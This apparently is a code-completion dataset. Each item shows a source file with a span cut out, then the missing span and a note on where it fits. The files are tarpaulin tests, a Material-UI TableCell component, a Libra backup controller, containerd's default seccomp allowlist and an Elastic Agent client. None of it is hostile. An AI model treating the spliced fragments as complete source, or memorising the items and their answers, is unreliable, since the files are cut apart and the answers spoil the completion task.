assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); let ctx = Context { config: &config, file_contents: "fn test_not_unreachable() { while true { bar(); } unreachable!(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(1))); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); let ctx = Context { config: &config, file_contents: "fn test_not_unreachable() -> usize { for i in &[1,2,3,4] { return *i; } unreachable!(); }", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(1))); assert!(!lines.ignore.contains(&Lines::Line(2))); assert!(!lines.ignore.contains(&Lines::Line(3))); assert!(!lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(5))); } #[test] fn single_line_callables() { let config = Config::default(); let ctx = Context { config: &config, file_contents: "struct A; impl A { fn foo() {} fn bar(i: i32) {} } fn foo() {} fn bar(i: i32) {} fn blah() { foo(); A::foo(); bar(2); A::bar(2); } ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(!lines.ignore.contains(&Lines::Line(11))); assert!(!lines.ignore.contains(&Lines::Line(12))); assert!(!lines.ignore.contains(&Lines::Line(13))); assert!(!lines.ignore.contains(&Lines::Line(14))); } #[test] fn visit_generics() { let config = Config::default(); let ctx = Context { config: &config, 
file_contents: "fn blah<T>(t: T) where T: Clone, T: Eq { println!(\"{:?}\", t.clone()); } pub trait Foo<T> // 9 where T: Clone { fn cloney(&self) -> Self { self.clone() } } impl<T> Foo<T> for T // 18 where T: Clone {} ", file: Path::new(""), ignore_mods: RefCell::new(HashSet::new()), }; let parser = parse_file(ctx.file_contents).unwrap(); let mut analysis = SourceAnalysis::new(); analysis.process_items(&parser.items, &ctx); let lines = analysis.get_line_analysis(ctx.file.to_path_buf()); assert!(lines.ignore.contains(&Lines::Line(2))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(4))); assert!(lines.ignore.contains(&Lines::Line(3))); assert!(lines.ignore.contains(&Lines::Line(10))); assert!(lines.ignore.contains(&Lines::Line(11))); assert!(lines.ignore.contains(&Lines::Line(19))); assert!(lines.ignore.contains(&Lines::Line(20))); }
tarpaulin_skip_trait_attrs
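This completion appears to fill the gap between the trailing `#[test] fn` above and the `() {` that follows it. Spliced back together (line breaks and indentation reconstructed here; the body is unchanged from the text above), the test declaration reads:

#[test]
fn tarpaulin_skip_trait_attrs() {
    let config = Config::default();
    // ... body as shown above ...
}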
TableCell.js
import React from 'react'; import PropTypes from 'prop-types'; import classNames from 'classnames'; import withStyles from '../styles/withStyles'; import { capitalize } from '../utils/helpers'; import { darken, fade, lighten } from '../styles/colorManipulator'; export const styles = theme => ({ /* Styles applied to the root element. */ root: { display: 'table-cell', verticalAlign: 'inherit', // Workaround for a rendering bug with spanned columns in Chrome 62.0. // Removes the alpha (sets it to 1), and lightens or darkens the theme color. borderBottom: `1px solid ${ theme.palette.type === 'light' ? lighten(fade(theme.palette.divider, 1), 0.88) : darken(fade(theme.palette.divider, 1), 0.8) }`, textAlign: 'left', padding: '4px 56px 4px 24px', '&:last-child': { paddingRight: 24, }, }, /* Styles applied to the root element if `variant="head"` or `context.table.head`. */ head: { color: theme.palette.text.secondary, fontSize: theme.typography.pxToRem(12), fontWeight: theme.typography.fontWeightMedium, }, /* Styles applied to the root element if `variant="body"` or `context.table.body`. */ body: { color: theme.palette.text.primary, fontSize: theme.typography.pxToRem(13), fontWeight: theme.typography.fontWeightRegular, }, /* Styles applied to the root element if `variant="footer"` or `context.table.footer`. */ footer: { borderBottom: 0, color: theme.palette.text.secondary,
}, /* Styles applied to the root element if `numeric={true}`. */ numeric: { textAlign: 'right', flexDirection: 'row-reverse', // can be dynamically inherited at runtime by contents }, /* Styles applied to the root element if `padding="dense"`. */ paddingDense: { paddingRight: 24, }, /* Styles applied to the root element if `padding="checkbox"`. */ paddingCheckbox: { padding: '0 12px', '&:last-child': { paddingRight: 12, }, }, /* Styles applied to the root element if `padding="none"`. */ paddingNone: { padding: 0, '&:last-child': { padding: 0, }, }, }); function TableCell(props, context) { const { children, classes, className: classNameProp, component, sortDirection, numeric, padding: paddingProp, scope: scopeProp, variant, ...other } = props; const { table, tablelvl2 } = context; let Component; if (component) { Component = component; } else { Component = tablelvl2 && tablelvl2.variant === 'head' ? 'th' : 'td'; } let scope = scopeProp; if (!scope && tablelvl2 && tablelvl2.variant === 'head') { scope = 'col'; } const padding = paddingProp || (table && table.padding ? table.padding : 'default'); const className = classNames( classes.root, { [classes.head]: variant ? variant === 'head' : tablelvl2 && tablelvl2.variant === 'head', [classes.body]: variant ? variant === 'body' : tablelvl2 && tablelvl2.variant === 'body', [classes.footer]: variant ? variant === 'footer' : tablelvl2 && tablelvl2.variant === 'footer', [classes.numeric]: numeric, [classes[`padding${capitalize(padding)}`]]: padding !== 'default', }, classNameProp, ); let ariaSort = null; if (sortDirection) { ariaSort = sortDirection === 'asc' ? 'ascending' : 'descending'; } return ( <Component className={className} aria-sort={ariaSort} scope={scope} {...other}> {children} </Component> ); } TableCell.propTypes = { /** * The table cell contents. */ children: PropTypes.node, /** * Override or extend the styles applied to the component. * See [CSS API](#css-api) below for more details. */ classes: PropTypes.object.isRequired, /** * @ignore */ className: PropTypes.string, /** * The component used for the root node. * Either a string to use a DOM element or a component. */ component: PropTypes.oneOfType([PropTypes.string, PropTypes.func, PropTypes.object]), /** * If `true`, content will align to the right. */ numeric: PropTypes.bool, /** * Sets the padding applied to the cell. * By default, the Table parent component set the value. */ padding: PropTypes.oneOf(['default', 'checkbox', 'dense', 'none']), /** * Set scope attribute. */ scope: PropTypes.string, /** * Set aria-sort direction. */ sortDirection: PropTypes.oneOf(['asc', 'desc', false]), /** * Specify the cell type. * By default, the TableHead, TableBody or TableFooter parent component set the value. */ variant: PropTypes.oneOf(['head', 'body', 'footer']), }; TableCell.defaultProps = { numeric: false, }; TableCell.contextTypes = { table: PropTypes.object, tablelvl2: PropTypes.object, }; export default withStyles(styles, { name: 'MuiTableCell' })(TableCell);
fontSize: theme.typography.pxToRem(12),
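This completion appears to belong inside the `footer` style rule above, between `color: theme.palette.text.secondary,` and the closing `},`. Rejoined (formatting reconstructed, content unchanged):

footer: {
  borderBottom: 0,
  color: theme.palette.text.secondary,
  fontSize: theme.typography.pxToRem(12),
},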
backup.rs
// Copyright (c) The Libra Core Contributors // SPDX-License-Identifier: Apache-2.0 use crate::{ backup_types::state_snapshot::manifest::{StateSnapshotBackup, StateSnapshotChunk}, storage::{BackupHandleRef, BackupStorage, FileHandle, ShellSafeName}, utils::{ backup_service_client::BackupServiceClient, read_record_bytes::ReadRecordBytes, should_cut_chunk, GlobalBackupOpt, }, }; use anyhow::{anyhow, Result}; use bytes::Bytes; use libra_crypto::HashValue; use libra_types::{ account_state_blob::AccountStateBlob, ledger_info::LedgerInfoWithSignatures, proof::TransactionInfoWithProof, transaction::Version, }; use once_cell::sync::Lazy; use std::{convert::TryInto, str::FromStr, sync::Arc}; use structopt::StructOpt; use tokio::io::AsyncWriteExt; #[derive(StructOpt)] pub struct StateSnapshotBackupOpt { #[structopt( long = "state-version", help = "Version at which a state snapshot to be taken." )] pub version: Version, } pub struct StateSnapshotBackupController { version: Version, max_chunk_size: usize, client: Arc<BackupServiceClient>, storage: Arc<dyn BackupStorage>, } impl StateSnapshotBackupController { pub fn new( opt: StateSnapshotBackupOpt, global_opt: GlobalBackupOpt, client: Arc<BackupServiceClient>, storage: Arc<dyn BackupStorage>, ) -> Self { Self { version: opt.version, max_chunk_size: global_opt.max_chunk_size, client, storage, } } pub async fn run(self) -> Result<FileHandle> { let backup_handle = self.storage.create_backup(&self.backup_name()).await?; let mut chunks = vec![]; let mut state_snapshot_file = self.client.get_state_snapshot(self.version).await?; let mut prev_record_bytes = state_snapshot_file .read_record_bytes() .await? .ok_or_else(|| anyhow!("State is empty."))?; let mut chunk_bytes = (prev_record_bytes.len() as u32).to_be_bytes().to_vec(); chunk_bytes.extend(&prev_record_bytes); let mut chunk_first_key = Self::parse_key(&prev_record_bytes)?; let mut current_idx: usize = 0; let mut chunk_first_idx: usize = 0; while let Some(record_bytes) = state_snapshot_file.read_record_bytes().await? { if should_cut_chunk(&chunk_bytes, &record_bytes, self.max_chunk_size) { println!("New Chunk."); let chunk = self .write_chunk( &backup_handle, &chunk_bytes, chunk_first_idx, current_idx, chunk_first_key, Self::parse_key(&prev_record_bytes)?, ) .await?; chunks.push(chunk); chunk_bytes = vec![]; chunk_first_idx = current_idx + 1; chunk_first_key = Self::parse_key(&record_bytes)?; } current_idx += 1; chunk_bytes.extend(&(record_bytes.len() as u32).to_be_bytes()); chunk_bytes.extend(&record_bytes); prev_record_bytes = record_bytes; } assert!(!chunk_bytes.is_empty()); println!("Last chunk."); let chunk = self .write_chunk( &backup_handle,
chunk_first_key, Self::parse_key(&prev_record_bytes)?, ) .await?; chunks.push(chunk); self.write_manifest(&backup_handle, chunks).await } } impl StateSnapshotBackupController { fn backup_name(&self) -> ShellSafeName { format!("state_ver_{}", self.version).try_into().unwrap() } fn manifest_name() -> &'static ShellSafeName { static NAME: Lazy<ShellSafeName> = Lazy::new(|| ShellSafeName::from_str("state.manifest").unwrap()); &NAME } fn proof_name() -> &'static ShellSafeName { static NAME: Lazy<ShellSafeName> = Lazy::new(|| ShellSafeName::from_str("state.proof").unwrap()); &NAME } fn chunk_name(first_idx: usize) -> ShellSafeName { format!("{}-.chunk", first_idx).try_into().unwrap() } fn chunk_proof_name(first_idx: usize, last_idx: usize) -> ShellSafeName { format!("{}-{}.proof", first_idx, last_idx) .try_into() .unwrap() } fn parse_key(record: &Bytes) -> Result<HashValue> { let (key, _): (HashValue, AccountStateBlob) = lcs::from_bytes(record)?; Ok(key) } async fn write_chunk( &self, backup_handle: &BackupHandleRef, chunk_bytes: &[u8], first_idx: usize, last_idx: usize, first_key: HashValue, last_key: HashValue, ) -> Result<StateSnapshotChunk> { println!("Asking proof for key: {:?}", last_key); let (chunk_handle, mut chunk_file) = self .storage .create_for_write(backup_handle, &Self::chunk_name(first_idx)) .await?; chunk_file.write_all(&chunk_bytes).await?; let (proof_handle, mut proof_file) = self .storage .create_for_write(backup_handle, &Self::chunk_proof_name(first_idx, last_idx)) .await?; tokio::io::copy( &mut self .client .get_account_range_proof(last_key, self.version) .await?, &mut proof_file, ) .await?; Ok(StateSnapshotChunk { first_idx, last_idx, first_key, last_key, blobs: chunk_handle, proof: proof_handle, }) } async fn write_manifest( &self, backup_handle: &BackupHandleRef, chunks: Vec<StateSnapshotChunk>, ) -> Result<FileHandle> { let proof_bytes = self.client.get_state_root_proof(self.version).await?; let (txn_info, _): (TransactionInfoWithProof, LedgerInfoWithSignatures) = lcs::from_bytes(&proof_bytes)?; let (proof_handle, mut proof_file) = self .storage .create_for_write(&backup_handle, Self::proof_name()) .await?; proof_file.write_all(&proof_bytes).await?; let manifest = StateSnapshotBackup { version: self.version, root_hash: txn_info.transaction_info().state_root_hash(), chunks, proof: proof_handle, }; let (manifest_handle, mut manifest_file) = self .storage .create_for_write(&backup_handle, Self::manifest_name()) .await?; manifest_file .write_all(&serde_json::to_vec(&manifest)?) .await?; Ok(manifest_handle) } }
&chunk_bytes, chunk_first_idx, current_idx,
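This completion appears to supply the missing arguments of the final `write_chunk` call above, in the same argument order as the call made inside the loop. Rejoined (formatting reconstructed, content unchanged):

let chunk = self
    .write_chunk(
        &backup_handle,
        &chunk_bytes,
        chunk_first_idx,
        current_idx,
        chunk_first_key,
        Self::parse_key(&prev_record_bytes)?,
    )
    .await?;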
seccomp_default.go
// +build linux /* Copyright The containerd Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package seccomp import ( "runtime" "golang.org/x/sys/unix" "github.com/opencontainers/runtime-spec/specs-go" ) func arches() []specs.Arch { switch runtime.GOARCH { case "amd64": return []specs.Arch{specs.ArchX86_64, specs.ArchX86, specs.ArchX32} case "arm64": return []specs.Arch{specs.ArchARM, specs.ArchAARCH64} case "mips64": return []specs.Arch{specs.ArchMIPS, specs.ArchMIPS64, specs.ArchMIPS64N32} case "mips64n32": return []specs.Arch{specs.ArchMIPS, specs.ArchMIPS64, specs.ArchMIPS64N32} case "mipsel64": return []specs.Arch{specs.ArchMIPSEL, specs.ArchMIPSEL64, specs.ArchMIPSEL64N32} case "mipsel64n32": return []specs.Arch{specs.ArchMIPSEL, specs.ArchMIPSEL64, specs.ArchMIPSEL64N32} case "s390x": return []specs.Arch{specs.ArchS390, specs.ArchS390X} default: return []specs.Arch{} } } // DefaultProfile defines the allowed syscalls for the default seccomp profile. func DefaultProfile(sp *specs.Spec) *specs.LinuxSeccomp { syscalls := []specs.LinuxSyscall{ { Names: []string{ "accept", "accept4", "access", "adjtimex", "alarm", "bind", "brk", "capget", "capset", "chdir", "chmod", "chown", "chown32", "clock_adjtime", "clock_adjtime64", "clock_getres", "clock_getres_time64", "clock_gettime", "clock_gettime64", "clock_nanosleep", "clock_nanosleep_time64", "close", "close_range", "connect", "copy_file_range", "creat", "dup", "dup2", "dup3", "epoll_create", "epoll_create1", "epoll_ctl", "epoll_ctl_old", "epoll_pwait", "epoll_pwait2", "epoll_wait", "epoll_wait_old", "eventfd", "eventfd2", "execve", "execveat", "exit", "exit_group", "faccessat", "faccessat2", "fadvise64", "fadvise64_64", "fallocate", "fanotify_mark", "fchdir", "fchmod", "fchmodat", "fchown", "fchown32", "fchownat", "fcntl", "fcntl64", "fdatasync", "fgetxattr", "flistxattr", "flock", "fork", "fremovexattr", "fsetxattr", "fstat", "fstat64", "fstatat64", "fstatfs", "fstatfs64", "fsync", "ftruncate", "ftruncate64", "futex", "futex_time64", "futimesat", "getcpu", "getcwd", "getdents", "getdents64", "getegid", "getegid32", "geteuid", "geteuid32", "getgid", "getgid32", "getgroups", "getgroups32", "getitimer", "getpeername", "getpgid", "getpgrp", "getpid", "getppid", "getpriority", "getrandom", "getresgid", "getresgid32", "getresuid", "getresuid32", "getrlimit", "get_robust_list", "getrusage", "getsid", "getsockname", "getsockopt", "get_thread_area", "gettid", "gettimeofday", "getuid", "getuid32", "getxattr", "inotify_add_watch", "inotify_init", "inotify_init1", "inotify_rm_watch", "io_cancel", "ioctl", "io_destroy", "io_getevents", "io_pgetevents", "io_pgetevents_time64", "ioprio_get", "ioprio_set", "io_setup", "io_submit", "io_uring_enter", "io_uring_register", "io_uring_setup", "ipc", "kill", "lchown", "lchown32", "lgetxattr", "link", "linkat", "listen", "listxattr", "llistxattr", "_llseek", "lremovexattr", "lseek", "lsetxattr", "lstat", "lstat64", "madvise", "membarrier", "memfd_create", "mincore", "mkdir", "mkdirat", "mknod", "mknodat", "mlock", "mlock2", "mlockall", 
"mmap", "mmap2", "mprotect", "mq_getsetattr", "mq_notify", "mq_open", "mq_timedreceive", "mq_timedreceive_time64", "mq_timedsend", "mq_timedsend_time64", "mq_unlink", "mremap", "msgctl", "msgget", "msgrcv", "msgsnd", "msync", "munlock", "munlockall", "munmap", "nanosleep", "newfstatat", "_newselect", "open", "openat", "openat2", "pause", "pidfd_open", "pidfd_send_signal", "pipe", "pipe2", "poll", "ppoll", "ppoll_time64", "prctl", "pread64", "preadv", "preadv2", "prlimit64", "pselect6", "pselect6_time64", "pwrite64", "pwritev", "pwritev2", "read", "readahead", "readlink", "readlinkat", "readv", "recv", "recvfrom", "recvmmsg", "recvmmsg_time64", "recvmsg", "remap_file_pages", "removexattr", "rename", "renameat", "renameat2", "restart_syscall", "rmdir", "rseq", "rt_sigaction", "rt_sigpending", "rt_sigprocmask", "rt_sigqueueinfo", "rt_sigreturn", "rt_sigsuspend", "rt_sigtimedwait", "rt_sigtimedwait_time64", "rt_tgsigqueueinfo", "sched_getaffinity", "sched_getattr", "sched_getparam", "sched_get_priority_max", "sched_get_priority_min", "sched_getscheduler", "sched_rr_get_interval", "sched_rr_get_interval_time64", "sched_setaffinity", "sched_setattr", "sched_setparam", "sched_setscheduler", "sched_yield", "seccomp", "select", "semctl", "semget", "semop", "semtimedop", "semtimedop_time64", "send", "sendfile", "sendfile64", "sendmmsg", "sendmsg", "sendto", "setfsgid", "setfsgid32", "setfsuid", "setfsuid32", "setgid", "setgid32", "setgroups", "setgroups32", "setitimer", "setpgid", "setpriority", "setregid", "setregid32", "setresgid", "setresgid32", "setresuid", "setresuid32", "setreuid", "setreuid32", "setrlimit", "set_robust_list", "setsid", "setsockopt", "set_thread_area", "set_tid_address", "setuid", "setuid32", "setxattr", "shmat", "shmctl", "shmdt", "shmget", "shutdown", "sigaltstack", "signalfd", "signalfd4", "sigprocmask", "sigreturn", "socket", "socketcall", "socketpair", "splice", "stat", "stat64", "statfs", "statfs64", "statx", "symlink", "symlinkat", "sync", "sync_file_range", "syncfs", "sysinfo", "tee", "tgkill", "time", "timer_create", "timer_delete", "timer_getoverrun", "timer_gettime", "timer_gettime64", "timer_settime", "timer_settime64", "timerfd_create", "timerfd_gettime", "timerfd_gettime64", "timerfd_settime", "timerfd_settime64", "times", "tkill", "truncate", "truncate64", "ugetrlimit", "umask", "uname", "unlink", "unlinkat", "utime", "utimensat", "utimensat_time64", "utimes", "vfork", "vmsplice", "wait4",
"waitpid", "write", "writev", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }, { Names: []string{"personality"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 0, Value: 0x0, Op: specs.OpEqualTo, }, }, }, { Names: []string{"personality"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 0, Value: 0x0008, Op: specs.OpEqualTo, }, }, }, { Names: []string{"personality"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 0, Value: 0x20000, Op: specs.OpEqualTo, }, }, }, { Names: []string{"personality"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 0, Value: 0x20008, Op: specs.OpEqualTo, }, }, }, { Names: []string{"personality"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 0, Value: 0xffffffff, Op: specs.OpEqualTo, }, }, }, } s := &specs.LinuxSeccomp{ DefaultAction: specs.ActErrno, Architectures: arches(), Syscalls: syscalls, } // include by arch switch runtime.GOARCH { case "ppc64le": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "sync_file_range2", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "arm", "arm64": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "arm_fadvise64_64", "arm_sync_file_range", "sync_file_range2", "breakpoint", "cacheflush", "set_tls", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "amd64": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "arch_prctl", "modify_ldt", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "386": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "modify_ldt", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "s390", "s390x": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "s390_pci_mmio_read", "s390_pci_mmio_write", "s390_runtime_instr", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) } admin := false for _, c := range sp.Process.Capabilities.Bounding { switch c { case "CAP_DAC_READ_SEARCH": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{"open_by_handle_at"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_ADMIN": admin = true s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "bpf", "clone", "fanotify_init", "fsconfig", "fsmount", "fsopen", "fspick", "lookup_dcookie", "mount", "move_mount", "name_to_handle_at", "open_tree", "perf_event_open", "quotactl", "setdomainname", "sethostname", "setns", "syslog", "umount", "umount2", "unshare", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_BOOT": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{"reboot"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_CHROOT": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{"chroot"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_MODULE": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "delete_module", "init_module", "finit_module", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_PACCT": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{"acct"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_PTRACE": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "kcmp", "pidfd_getfd", "process_madvise", "process_vm_readv", "process_vm_writev", "ptrace", }, Action: specs.ActAllow, Args: 
[]specs.LinuxSeccompArg{}, }) case "CAP_SYS_RAWIO": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "iopl", "ioperm", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_TIME": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "settimeofday", "stime", "clock_settime", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYS_TTY_CONFIG": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{"vhangup"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) case "CAP_SYSLOG": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{"syslog"}, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{}, }) } } if !admin { switch runtime.GOARCH { case "s390", "s390x": s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "clone", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 1, Value: unix.CLONE_NEWNS | unix.CLONE_NEWUTS | unix.CLONE_NEWIPC | unix.CLONE_NEWUSER | unix.CLONE_NEWPID | unix.CLONE_NEWNET | unix.CLONE_NEWCGROUP, ValueTwo: 0, Op: specs.OpMaskedEqual, }, }, }) default: s.Syscalls = append(s.Syscalls, specs.LinuxSyscall{ Names: []string{ "clone", }, Action: specs.ActAllow, Args: []specs.LinuxSeccompArg{ { Index: 0, Value: unix.CLONE_NEWNS | unix.CLONE_NEWUTS | unix.CLONE_NEWIPC | unix.CLONE_NEWUSER | unix.CLONE_NEWPID | unix.CLONE_NEWNET | unix.CLONE_NEWCGROUP, ValueTwo: 0, Op: specs.OpMaskedEqual, }, }, }) } } return s }
"waitid",
client.go
// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. package client import ( "context" "encoding/json" "fmt" "sync" "time" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/proto" ) // Status is the status of the Elastic Agent type Status = proto.Status const ( // Starting is when the it is still starting. Starting Status = proto.Status_STARTING // Configuring is when it is configuring. Configuring Status = proto.Status_CONFIGURING // Healthy is when it is healthy. Healthy Status = proto.Status_HEALTHY // Degraded is when it is degraded. Degraded Status = proto.Status_DEGRADED // Failed is when it is failed. Failed Status = proto.Status_FAILED // Stopping is when it is stopping. Stopping Status = proto.Status_STOPPING // Upgrading is when it is upgrading. Upgrading Status = proto.Status_UPGRADING ) // Version is the current running version of the daemon. type Version struct { Version string Commit string BuildTime time.Time Snapshot bool } // ApplicationStatus is a status of an application inside of Elastic Agent. type ApplicationStatus struct { ID string Name string Status Status Message string Payload map[string]interface{} } // ProcMeta is the running version and ID information for a running process. type ProcMeta struct { Process string Name string Hostname string ID string EphemeralID string Version string BuildCommit string BuildTime time.Time Username string UserID string UserGID string BinaryArchitecture string RouteKey string ElasticLicensed bool Error string } // AgentStatus is the current status of the Elastic Agent. type AgentStatus struct { Status Status Message string Applications []*ApplicationStatus } // Client communicates to Elastic Agent through the control protocol. type Client interface { // Connect connects to the running Elastic Agent. Connect(ctx context.Context) error // Disconnect disconnects from the running Elastic Agent. Disconnect() // Version returns the current version of the running agent. Version(ctx context.Context) (Version, error) // Status returns the current status of the running agent. Status(ctx context.Context) (*AgentStatus, error) // Restart triggers restarting the current running daemon. Restart(ctx context.Context) error // Upgrade triggers upgrade of the current running daemon. Upgrade(ctx context.Context, version string, sourceURI string) (string, error) // ProcMeta gathers running process meta-data. ProcMeta(ctx context.Context) ([]ProcMeta, error) } // client manages the state and communication to the Elastic Agent. type client struct { ctx context.Context cancel context.CancelFunc wg sync.WaitGroup client proto.ElasticAgentControlClient } // New creates a client connection to Elastic Agent. func New() Client { return &client{} } // Connect connects to the running Elastic Agent. func (c *client) Connect(ctx context.Context) error { c.ctx, c.cancel = context.WithCancel(ctx) conn, err := dialContext(ctx) if err != nil { return err } c.client = proto.NewElasticAgentControlClient(conn) return nil } // Disconnect disconnects from the running Elastic Agent. func (c *client) Disconnect() { if c.cancel != nil { c.cancel() c.wg.Wait() c.ctx = nil c.cancel = nil } } // Version returns the current version of the running agent. 
func (c *client) Version(ctx context.Context) (Version, error) { res, err := c.client.Version(ctx, &proto.Empty{}) if err != nil { return Version{}, err } bt, err := time.Parse(control.TimeFormat(), res.BuildTime) if err != nil { return Version{}, err } return Version{ Version: res.Version, Commit: res.Commit, BuildTime: bt, Snapshot: res.Snapshot, }, nil } // Status returns the current status of the running agent. func (c *client) Status(ctx context.Context) (*AgentStatus, error) { res, err := c.client.Status(ctx, &proto.Empty{}) if err != nil { return nil, err } s := &AgentStatus{ Status: res.Status, Message: res.Message, Applications: make([]*ApplicationStatus, len(res.Applications)), } for i, appRes := range res.Applications { var payload map[string]interface{} if appRes.Payload != "" { err := json.Unmarshal([]byte(appRes.Payload), &payload) if err != nil { return nil, err } } s.Applications[i] = &ApplicationStatus{ ID: appRes.Id, Name: appRes.Name, Status: appRes.Status, Message: appRes.Message, Payload: payload, } } return s, nil } // Restart triggers restarting the current running daemon. func (c *client) Restart(ctx context.Context) error { res, err := c.client.Restart(ctx, &proto.Empty{}) if err != nil { return err } if res.Status == proto.ActionStatus_FAILURE { return fmt.Errorf(res.Error) } return nil } // Upgrade triggers upgrade of the current running daemon. func (c *client) Upgrade(ctx context.Context, version string, sourceURI string) (string, error) { res, err := c.client.Upgrade(ctx, &proto.UpgradeRequest{ Version: version, SourceURI: sourceURI, }) if err != nil { return "", err } if res.Status == proto.ActionStatus_FAILURE { return "", fmt.Errorf(res.Error) } return res.Version, nil } // ProcMeta gathers running beat metadata. func (c *client) ProcMeta(ctx context.Context) ([]ProcMeta, error) { resp, err := c.client.ProcMeta(ctx, &proto.Empty{}) if err != nil { return nil, err } procMeta := []ProcMeta{} for _, proc := range resp.Procs { meta := ProcMeta{ Process: proc.Process, Name: proc.Name, Hostname: proc.Hostname, ID: proc.Id, EphemeralID: proc.EphemeralId, Version: proc.Version, BuildCommit: proc.BuildCommit, Username: proc.Username, UserID: proc.UserId, UserGID: proc.UserGid, BinaryArchitecture: proc.Architecture, RouteKey: proc.RouteKey, ElasticLicensed: proc.ElasticLicensed, Error: proc.Error, } if proc.BuildTime != "" { ts, err := time.Parse(time.RFC3339, proc.BuildTime) if err != nil
else { meta.BuildTime = ts } } procMeta = append(procMeta, meta) } return procMeta, nil }
{ if meta.Error != "" { meta.Error += ", " + err.Error() } else { meta.Error = err.Error() } }
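This completion appears to be the body of the `if err != nil` branch left open above; the `else` branch that follows it sets `meta.BuildTime`. Rejoined (formatting reconstructed, content unchanged):

if proc.BuildTime != "" {
	ts, err := time.Parse(time.RFC3339, proc.BuildTime)
	if err != nil {
		if meta.Error != "" {
			meta.Error += ", " + err.Error()
		} else {
			meta.Error = err.Error()
		}
	} else {
		meta.BuildTime = ts
	}
}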
state.rs
